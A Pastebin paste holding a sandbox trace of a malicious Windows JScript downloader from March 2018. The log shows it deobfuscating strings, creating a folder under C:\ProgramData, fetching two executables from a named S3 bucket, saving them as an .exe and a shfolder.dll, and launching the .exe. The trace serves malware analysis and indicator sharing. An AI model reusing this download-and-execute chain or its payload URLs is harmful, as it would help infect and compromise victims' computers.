API tools faq
paste
Advertisement
James_inthe_box

run

James_inthe_box
Mar 6th, 2018
168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.52 KB | None | 0 0
raw download clone embed print report
  1. 6 Mar 17:16:10 - ActiveXObject(WScript.Shell)
  2. 6 Mar 17:16:10 - new WScript.Shell[14]
  3. 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
  4. 6 Mar 17:16:10 - new Scripting.FileSystemObject[15]
  5. 6 Mar 17:16:10 - new DriveObject[16](C:)
  6. 6 Mar 17:16:10 - DriveObject[16](C:).name = (string) 'C:'
  7. 6 Mar 17:16:10 - new Collection[17]
  8. 6 Mar 17:16:10 - Calling unescape() no.: 13
  9. 6 Mar 17:16:10 - Calling unescape() no.: 14
  10. 6 Mar 17:16:10 - Calling unescape() no.: 15
  11. 6 Mar 17:16:10 - Calling unescape() no.: 16
  12. 6 Mar 17:16:10 - Calling unescape() no.: 17
  13. 6 Mar 17:16:10 - Calling unescape() no.: 18
  14. 6 Mar 17:16:10 - Calling unescape() no.: 19
  15. 6 Mar 17:16:10 - Calling unescape() no.: 20
  16. 6 Mar 17:16:10 - Calling unescape() no.: 21
  17. 6 Mar 17:16:10 - Calling unescape() no.: 22
  18. 6 Mar 17:16:10 - Calling unescape() no.: 23
  19. 6 Mar 17:16:10 - Calling unescape() no.: 24
  20. 6 Mar 17:16:10 - Calling unescape() no.: 25
  21. 6 Mar 17:16:10 - Calling unescape() no.: 26
  22. 6 Mar 17:16:10 - Calling unescape() no.: 27
  23. 6 Mar 17:16:10 - Calling unescape() no.: 28
  24. 6 Mar 17:16:10 - Calling unescape() no.: 29
  25. 6 Mar 17:16:10 - Calling unescape() no.: 30
  26. 6 Mar 17:16:10 - Calling unescape() no.: 31
  27. 6 Mar 17:16:10 - Calling unescape() no.: 32
  28. 6 Mar 17:16:10 - Calling unescape() no.: 33
  29. 6 Mar 17:16:10 - Calling unescape() no.: 34
  30. 6 Mar 17:16:10 - Calling unescape() no.: 35
  31. 6 Mar 17:16:10 - Scripting.FileSystemObject[15].FileExists(C:\\ProgramData\\abc123) => false
  32. 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
  33. 6 Mar 17:16:10 - new Scripting.FileSystemObject[18]
  34. 6 Mar 17:16:10 - new DriveObject[19](C:)
  35. 6 Mar 17:16:10 - DriveObject[19](C:).name = (string) 'C:'
  36. 6 Mar 17:16:10 - new Collection[20]
  37. 6 Mar 17:16:10 - Calling unescape() no.: 36
  38. 6 Mar 17:16:10 - Calling unescape() no.: 37
  39. 6 Mar 17:16:10 - Calling unescape() no.: 38
  40. 6 Mar 17:16:10 - Calling unescape() no.: 39
  41. 6 Mar 17:16:10 - Calling unescape() no.: 40
  42. 6 Mar 17:16:10 - Calling unescape() no.: 41
  43. 6 Mar 17:16:10 - Calling unescape() no.: 42
  44. 6 Mar 17:16:10 - Calling unescape() no.: 43
  45. 6 Mar 17:16:10 - Calling unescape() no.: 44
  46. 6 Mar 17:16:10 - Calling unescape() no.: 45
  47. 6 Mar 17:16:10 - Calling unescape() no.: 46
  48. 6 Mar 17:16:10 - Calling unescape() no.: 47
  49. 6 Mar 17:16:10 - Calling unescape() no.: 48
  50. 6 Mar 17:16:10 - Calling unescape() no.: 49
  51. 6 Mar 17:16:10 - Calling unescape() no.: 50
  52. 6 Mar 17:16:10 - Calling unescape() no.: 51
  53. 6 Mar 17:16:10 - Calling unescape() no.: 52
  54. 6 Mar 17:16:10 - Scripting.FileSystemObject[18].CreateFolder(C:\\ProgramData\\JQD2T4NFOFL9BW1)
  55. 6 Mar 17:16:10 - new FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1)
  56. 6 Mar 17:16:10 - FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1).name = (string) 'C:\\ProgramData\\JQD2T4NFOFL9BW1'
  57. 6 Mar 17:16:10 - FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1).parentfolder = (string) 'C:\ProgramData'
  58. 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
  59. 6 Mar 17:16:10 - new Scripting.FileSystemObject[22]
  60. 6 Mar 17:16:10 - new DriveObject[23](C:)
  61. 6 Mar 17:16:10 - DriveObject[23](C:).name = (string) 'C:'
  62. 6 Mar 17:16:10 - new Collection[24]
  63. 6 Mar 17:16:10 - Calling unescape() no.: 53
  64. 6 Mar 17:16:10 - Calling unescape() no.: 54
  65. 6 Mar 17:16:10 - Calling unescape() no.: 55
  66. 6 Mar 17:16:10 - Calling unescape() no.: 56
  67. 6 Mar 17:16:10 - Calling unescape() no.: 57
  68. 6 Mar 17:16:10 - Calling unescape() no.: 58
  69. 6 Mar 17:16:10 - Calling unescape() no.: 59
  70. 6 Mar 17:16:10 - Calling unescape() no.: 60
  71. 6 Mar 17:16:10 - Calling unescape() no.: 61
  72. 6 Mar 17:16:10 - Calling unescape() no.: 62
  73. 6 Mar 17:16:10 - Calling unescape() no.: 63
  74. 6 Mar 17:16:10 - Calling unescape() no.: 64
  75. 6 Mar 17:16:10 - Calling unescape() no.: 65
  76. 6 Mar 17:16:10 - Calling unescape() no.: 66
  77. 6 Mar 17:16:10 - Calling unescape() no.: 67
  78. 6 Mar 17:16:10 - Calling unescape() no.: 68
  79. 6 Mar 17:16:10 - Calling unescape() no.: 69
  80. 6 Mar 17:16:10 - Calling unescape() no.: 70
  81. 6 Mar 17:16:10 - Calling unescape() no.: 71
  82. 6 Mar 17:16:10 - Calling unescape() no.: 72
  83. 6 Mar 17:16:10 - Calling unescape() no.: 73
  84. 6 Mar 17:16:10 - Calling unescape() no.: 74
  85. 6 Mar 17:16:10 - Calling unescape() no.: 75
  86. 6 Mar 17:16:10 - Scripting.FileSystemObject[22].CreateTextFile(C:\\ProgramData\\abc123)
  87. 6 Mar 17:16:10 - new TextStream[25]
  88. 6 Mar 17:16:10 - TextStream[25].WriteLine(kroicf)
  89. 6 Mar 17:16:10 - FS.writeFile(C:\\ProgramData\\abc123, kroicf??)
  90. 6 Mar 17:16:10 - TextStream[25].Close()
  91. 6 Mar 17:16:10 - Calling unescape() no.: 76
  92. 6 Mar 17:16:10 - Calling unescape() no.: 77
  93. 6 Mar 17:16:10 - Calling unescape() no.: 78
  94. 6 Mar 17:16:10 - Calling unescape() no.: 79
  95. 6 Mar 17:16:10 - Calling unescape() no.: 80
  96. 6 Mar 17:16:10 - Calling unescape() no.: 81
  97. 6 Mar 17:16:10 - Calling unescape() no.: 82
  98. 6 Mar 17:16:10 - Calling unescape() no.: 83
  99. 6 Mar 17:16:10 - Calling unescape() no.: 84
  100. 6 Mar 17:16:10 - Calling unescape() no.: 85
  101. 6 Mar 17:16:10 - Calling unescape() no.: 86
  102. 6 Mar 17:16:10 - Calling unescape() no.: 87
  103. 6 Mar 17:16:10 - Calling unescape() no.: 88
  104. 6 Mar 17:16:10 - Calling unescape() no.: 89
  105. 6 Mar 17:16:10 - Calling unescape() no.: 90
  106. 6 Mar 17:16:10 - Calling unescape() no.: 91
  107. 6 Mar 17:16:10 - Calling unescape() no.: 92
  108. 6 Mar 17:16:10 - Calling unescape() no.: 93
  109. 6 Mar 17:16:10 - Calling unescape() no.: 94
  110. 6 Mar 17:16:10 - Calling unescape() no.: 95
  111. 6 Mar 17:16:10 - Calling unescape() no.: 96
  112. 6 Mar 17:16:10 - Calling unescape() no.: 97
  113. 6 Mar 17:16:10 - Calling unescape() no.: 98
  114. 6 Mar 17:16:10 - Calling unescape() no.: 99
  115. 6 Mar 17:16:10 - Calling unescape() no.: 100
  116. 6 Mar 17:16:10 - Calling unescape() no.: 101
  117. 6 Mar 17:16:10 - Calling unescape() no.: 102
  118. 6 Mar 17:16:10 - Calling unescape() no.: 103
  119. 6 Mar 17:16:10 - Calling unescape() no.: 104
  120. 6 Mar 17:16:10 - Calling unescape() no.: 105
  121. 6 Mar 17:16:10 - Calling unescape() no.: 106
  122. 6 Mar 17:16:10 - Calling unescape() no.: 107
  123. 6 Mar 17:16:10 - Calling unescape() no.: 108
  124. 6 Mar 17:16:10 - Calling unescape() no.: 109
  125. 6 Mar 17:16:10 - Calling unescape() no.: 110
  126. 6 Mar 17:16:10 - Calling unescape() no.: 111
  127. 6 Mar 17:16:10 - Calling unescape() no.: 112
  128. 6 Mar 17:16:10 - Calling unescape() no.: 113
  129. 6 Mar 17:16:10 - Calling unescape() no.: 114
  130. 6 Mar 17:16:10 - Calling unescape() no.: 115
  131. 6 Mar 17:16:10 - Calling unescape() no.: 116
  132. 6 Mar 17:16:10 - Calling unescape() no.: 117
  133. 6 Mar 17:16:10 - Calling unescape() no.: 118
  134. 6 Mar 17:16:10 - Calling unescape() no.: 119
  135. 6 Mar 17:16:10 - Calling unescape() no.: 120
  136. 6 Mar 17:16:10 - Calling unescape() no.: 121
  137. 6 Mar 17:16:10 - Calling unescape() no.: 122
  138. 6 Mar 17:16:10 - Calling unescape() no.: 123
  139. 6 Mar 17:16:10 - Calling unescape() no.: 124
  140. 6 Mar 17:16:10 - Calling unescape() no.: 125
  141. 6 Mar 17:16:10 - Calling unescape() no.: 126
  142. 6 Mar 17:16:10 - Calling unescape() no.: 127
  143. 6 Mar 17:16:10 - Calling unescape() no.: 128
  144. 6 Mar 17:16:10 - Calling unescape() no.: 129
  145. 6 Mar 17:16:10 - Calling unescape() no.: 130
  146. 6 Mar 17:16:10 - Calling unescape() no.: 131
  147. 6 Mar 17:16:10 - Calling unescape() no.: 132
  148. 6 Mar 17:16:10 - Calling unescape() no.: 133
  149. 6 Mar 17:16:10 - Calling unescape() no.: 134
  150. 6 Mar 17:16:10 - Calling unescape() no.: 135
  151. 6 Mar 17:16:10 - Calling unescape() no.: 136
  152. 6 Mar 17:16:10 - Calling unescape() no.: 137
  153. 6 Mar 17:16:10 - Calling unescape() no.: 138
  154. 6 Mar 17:16:10 - Calling unescape() no.: 139
  155. 6 Mar 17:16:10 - Calling unescape() no.: 140
  156. 6 Mar 17:16:10 - Calling unescape() no.: 141
  157. 6 Mar 17:16:10 - Calling unescape() no.: 142
  158. 6 Mar 17:16:10 - Calling unescape() no.: 143
  159. 6 Mar 17:16:10 - Calling unescape() no.: 144
  160. 6 Mar 17:16:10 - Calling unescape() no.: 145
  161. 6 Mar 17:16:10 - Calling unescape() no.: 146
  162. 6 Mar 17:16:10 - Calling unescape() no.: 147
  163. 6 Mar 17:16:10 - Calling unescape() no.: 148
  164. 6 Mar 17:16:10 - Calling unescape() no.: 149
  165. 6 Mar 17:16:10 - Calling unescape() no.: 150
  166. 6 Mar 17:16:10 - ActiveXObject(MSXML2.XMLHTTP)
  167. 6 Mar 17:16:10 - new MSXML2.XMLHTTP[26]
  168. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].onreadystatechange = (undefined) 'undefined'
  169. 6 Mar 17:16:10 - ActiveXObject(ADODB.Stream)
  170. 6 Mar 17:16:10 - new ADODB_Stream[27]
  171. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].open(GET,https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh,false)
  172. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].method = (string) 'GET'
  173. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].url = (string) 'https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh'
  174. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].async = (boolean) 'false'
  175. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].send(undefined)
  176. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].method.get() => (string) 'GET'
  177. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].url.get() => (string) 'https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh'
  178. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].status = (number) '200'
  179. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].readystate = (number) '4'
  180. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].statustext = (string) 'OK'
  181. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  182. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].allresponseheaders = (string) '{"x-amz-id-2":"z4XbaGhj9GJeqg2jpZZQqHDd0EtBewWX8a3SZJ66YcaX+1nsSWY+5Gc9QmtnggdNdr7XkulFQRU=","x-amz-request-id":"0264C3DA31459C4A","date":"Wed, 07 Mar 2018 00:16:17 GMT","last-modified":"Tue, 06 Mar 2018 00:14:17 GMT","etag":"\"b2218df5c3373a9a1b619e ... (truncated)'
  183. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].status.get() => (number) '200'
  184. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].allresponseheaders.get() => (string) '{"x-amz-id-2":"z4XbaGhj9GJeqg2jpZZQqHDd0EtBewWX8a3SZJ66YcaX+1nsSWY+5Gc9QmtnggdNdr7XkulFQRU=","x-amz-request-id":"0264C3DA31459C4A","date":"Wed, 07 Mar 2018 00:16:17 GMT","last-modified":"Tue, 06 Mar 2018 00:14:17 GMT","etag":"\"b2218df5c3373a9a1b619e ... (truncated)'
  185. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  186. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].statustext.get() => (string) 'OK'
  187. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].onreadystatechange.get() => (undefined) 'undefined'
  188. 6 Mar 17:16:17 - ADODB_Stream[27].type = (number) '1'
  189. 6 Mar 17:16:17 - ADODB_Stream[27].Open()
  190. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  191. 6 Mar 17:16:17 - ADODB_Stream[27].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  192. 6 Mar 17:16:17 - ADODB_Stream[27].Write(str) - 400872 bytes
  193. 6 Mar 17:16:17 - ADODB_Stream[27].size = (number) '400872'
  194. 6 Mar 17:16:17 - ADODB_Stream[27].SaveToFile(C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe, 2)
  195. 6 Mar 17:16:17 - ADODB_Stream[27].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  196. 6 Mar 17:16:17 - Calling unescape() no.: 151
  197. 6 Mar 17:16:17 - Calling unescape() no.: 152
  198. 6 Mar 17:16:17 - Calling unescape() no.: 153
  199. 6 Mar 17:16:17 - Calling unescape() no.: 154
  200. 6 Mar 17:16:17 - Calling unescape() no.: 155
  201. 6 Mar 17:16:17 - Calling unescape() no.: 156
  202. 6 Mar 17:16:17 - Calling unescape() no.: 157
  203. 6 Mar 17:16:17 - Calling unescape() no.: 158
  204. 6 Mar 17:16:17 - Calling unescape() no.: 159
  205. 6 Mar 17:16:17 - Calling unescape() no.: 160
  206. 6 Mar 17:16:17 - Calling unescape() no.: 161
  207. 6 Mar 17:16:17 - Calling unescape() no.: 162
  208. 6 Mar 17:16:17 - Calling unescape() no.: 163
  209. 6 Mar 17:16:17 - Calling unescape() no.: 164
  210. 6 Mar 17:16:17 - Calling unescape() no.: 165
  211. 6 Mar 17:16:17 - Calling unescape() no.: 166
  212. 6 Mar 17:16:17 - Calling unescape() no.: 167
  213. 6 Mar 17:16:17 - Calling unescape() no.: 168
  214. 6 Mar 17:16:17 - Calling unescape() no.: 169
  215. 6 Mar 17:16:17 - Calling unescape() no.: 170
  216. 6 Mar 17:16:17 - Calling unescape() no.: 171
  217. 6 Mar 17:16:17 - Calling unescape() no.: 172
  218. 6 Mar 17:16:17 - Calling unescape() no.: 173
  219. 6 Mar 17:16:17 - Calling unescape() no.: 174
  220. 6 Mar 17:16:17 - Calling unescape() no.: 175
  221. 6 Mar 17:16:17 - Calling unescape() no.: 176
  222. 6 Mar 17:16:17 - Calling unescape() no.: 177
  223. 6 Mar 17:16:17 - Calling unescape() no.: 178
  224. 6 Mar 17:16:17 - Calling unescape() no.: 179
  225. 6 Mar 17:16:17 - Calling unescape() no.: 180
  226. 6 Mar 17:16:17 - Calling unescape() no.: 181
  227. 6 Mar 17:16:17 - Calling unescape() no.: 182
  228. 6 Mar 17:16:17 - Calling unescape() no.: 183
  229. 6 Mar 17:16:17 - Calling unescape() no.: 184
  230. 6 Mar 17:16:17 - Calling unescape() no.: 185
  231. 6 Mar 17:16:17 - Calling unescape() no.: 186
  232. 6 Mar 17:16:17 - Calling unescape() no.: 187
  233. 6 Mar 17:16:17 - Calling unescape() no.: 188
  234. 6 Mar 17:16:17 - Calling unescape() no.: 189
  235. 6 Mar 17:16:17 - Calling unescape() no.: 190
  236. 6 Mar 17:16:17 - Calling unescape() no.: 191
  237. 6 Mar 17:16:17 - Calling unescape() no.: 192
  238. 6 Mar 17:16:17 - Calling unescape() no.: 193
  239. 6 Mar 17:16:17 - Calling unescape() no.: 194
  240. 6 Mar 17:16:17 - Calling unescape() no.: 195
  241. 6 Mar 17:16:17 - Calling unescape() no.: 196
  242. 6 Mar 17:16:17 - Calling unescape() no.: 197
  243. 6 Mar 17:16:17 - Calling unescape() no.: 198
  244. 6 Mar 17:16:17 - Calling unescape() no.: 199
  245. 6 Mar 17:16:17 - Calling unescape() no.: 200
  246. 6 Mar 17:16:17 - Calling unescape() no.: 201
  247. 6 Mar 17:16:17 - Calling unescape() no.: 202
  248. 6 Mar 17:16:17 - Calling unescape() no.: 203
  249. 6 Mar 17:16:17 - Calling unescape() no.: 204
  250. 6 Mar 17:16:17 - Calling unescape() no.: 205
  251. 6 Mar 17:16:17 - Calling unescape() no.: 206
  252. 6 Mar 17:16:17 - Calling unescape() no.: 207
  253. 6 Mar 17:16:17 - Calling unescape() no.: 208
  254. 6 Mar 17:16:17 - Calling unescape() no.: 209
  255. 6 Mar 17:16:17 - Calling unescape() no.: 210
  256. 6 Mar 17:16:17 - Calling unescape() no.: 211
  257. 6 Mar 17:16:17 - Calling unescape() no.: 212
  258. 6 Mar 17:16:17 - Calling unescape() no.: 213
  259. 6 Mar 17:16:17 - Calling unescape() no.: 214
  260. 6 Mar 17:16:17 - Calling unescape() no.: 215
  261. 6 Mar 17:16:17 - Calling unescape() no.: 216
  262. 6 Mar 17:16:17 - Calling unescape() no.: 217
  263. 6 Mar 17:16:17 - Calling unescape() no.: 218
  264. 6 Mar 17:16:17 - Calling unescape() no.: 219
  265. 6 Mar 17:16:17 - Calling unescape() no.: 220
  266. 6 Mar 17:16:17 - Calling unescape() no.: 221
  267. 6 Mar 17:16:17 - Calling unescape() no.: 222
  268. 6 Mar 17:16:17 - Calling unescape() no.: 223
  269. 6 Mar 17:16:17 - Calling unescape() no.: 224
  270. 6 Mar 17:16:17 - Calling unescape() no.: 225
  271. 6 Mar 17:16:17 - ActiveXObject(MSXML2.XMLHTTP)
  272. 6 Mar 17:16:17 - new MSXML2.XMLHTTP[28]
  273. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].onreadystatechange = (undefined) 'undefined'
  274. 6 Mar 17:16:17 - ActiveXObject(ADODB.Stream)
  275. 6 Mar 17:16:17 - new ADODB_Stream[29]
  276. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].open(GET,https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus,false)
  277. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].method = (string) 'GET'
  278. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].url = (string) 'https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus'
  279. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].async = (boolean) 'false'
  280. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].send(undefined)
  281. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].method.get() => (string) 'GET'
  282. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].url.get() => (string) 'https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus'
  283. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].status = (number) '200'
  284. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].readystate = (number) '4'
  285. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].statustext = (string) 'OK'
  286. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody = (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  287. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].allresponseheaders = (string) '{"x-amz-id-2":"twVm2lIBGZ3UZSE9E1SG3m9RxkoYZVBO/ip2rEEg0v9tveF7/GfBr2bRUJAs8EC6uuqaVnm/lfg=","x-amz-request-id":"3AD72BAB32268C37","date":"Wed, 07 Mar 2018 00:16:21 GMT","last-modified":"Tue, 06 Mar 2018 00:11:11 GMT","etag":"\"12b0eef551ecc5209fc31b ... (truncated)'
  288. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].status.get() => (number) '200'
  289. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].allresponseheaders.get() => (string) '{"x-amz-id-2":"twVm2lIBGZ3UZSE9E1SG3m9RxkoYZVBO/ip2rEEg0v9tveF7/GfBr2bRUJAs8EC6uuqaVnm/lfg=","x-amz-request-id":"3AD72BAB32268C37","date":"Wed, 07 Mar 2018 00:16:21 GMT","last-modified":"Tue, 06 Mar 2018 00:11:11 GMT","etag":"\"12b0eef551ecc5209fc31b ... (truncated)'
  290. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  291. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].statustext.get() => (string) 'OK'
  292. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].onreadystatechange.get() => (undefined) 'undefined'
  293. 6 Mar 17:16:36 - ADODB_Stream[29].type = (number) '1'
  294. 6 Mar 17:16:36 - ADODB_Stream[29].Open()
  295. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  296. 6 Mar 17:16:37 - ADODB_Stream[29].content = (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  297. 6 Mar 17:16:37 - ADODB_Stream[29].Write(str) - 5845088 bytes
  298. 6 Mar 17:16:37 - ADODB_Stream[29].size = (number) '5845088'
  299. 6 Mar 17:16:37 - ADODB_Stream[29].SaveToFile(C:\\ProgramData\\JQD2T4NFOFL9BW1\shfolder.dll, 2)
  300. 6 Mar 17:16:37 - ADODB_Stream[29].content.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  301. 6 Mar 17:16:37 - WScript.Sleep(11000)
  302. 6 Mar 17:16:48 - ActiveXObject(WScript.Shell)
  303. 6 Mar 17:16:48 - new WScript.Shell[30]
  304. 6 Mar 17:16:48 - Calling unescape() no.: 226
  305. 6 Mar 17:16:48 - Calling unescape() no.: 227
  306. 6 Mar 17:16:48 - Calling unescape() no.: 228
  307. 6 Mar 17:16:48 - Calling unescape() no.: 229
  308. 6 Mar 17:16:48 - Calling unescape() no.: 230
  309. 6 Mar 17:16:48 - Calling unescape() no.: 231
  310. 6 Mar 17:16:48 - Calling unescape() no.: 232
  311. 6 Mar 17:16:48 - Calling unescape() no.: 233
  312. 6 Mar 17:16:48 - Calling unescape() no.: 234
  313. 6 Mar 17:16:48 - Calling unescape() no.: 235
  314. 6 Mar 17:16:48 - Calling unescape() no.: 236
  315. 6 Mar 17:16:48 - Calling unescape() no.: 237
  316. 6 Mar 17:16:48 - Calling unescape() no.: 238
  317. 6 Mar 17:16:48 - Calling unescape() no.: 239
  318. 6 Mar 17:16:48 - Calling unescape() no.: 240
  319. 6 Mar 17:16:48 - Calling unescape() no.: 241
  320. 6 Mar 17:16:48 - Calling unescape() no.: 242
  321. 6 Mar 17:16:48 - Calling unescape() no.: 243
  322. 6 Mar 17:16:48 - WScript.Shell[30].Exec(C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe )
  323. 6 Mar 17:16:48 - new Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe )
  324. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).processid = (number) '31'
  325. 6 Mar 17:16:48 - new TextStream[32]
  326. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stdout = (object) 'TextStream[32]'
  327. 6 Mar 17:16:48 - new TextStream[33]
  328. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stderr = (object) 'TextStream[33]'
  329. 6 Mar 17:16:48 - new TextStream[34]
  330. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stdin = (object) 'TextStream[34]'
  331. 6 Mar 17:16:48 - ==> Cleaning up sandbox.
  332. 6 Mar 17:16:48 - ==> Script execution finished, dumping sandbox environment to a file.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!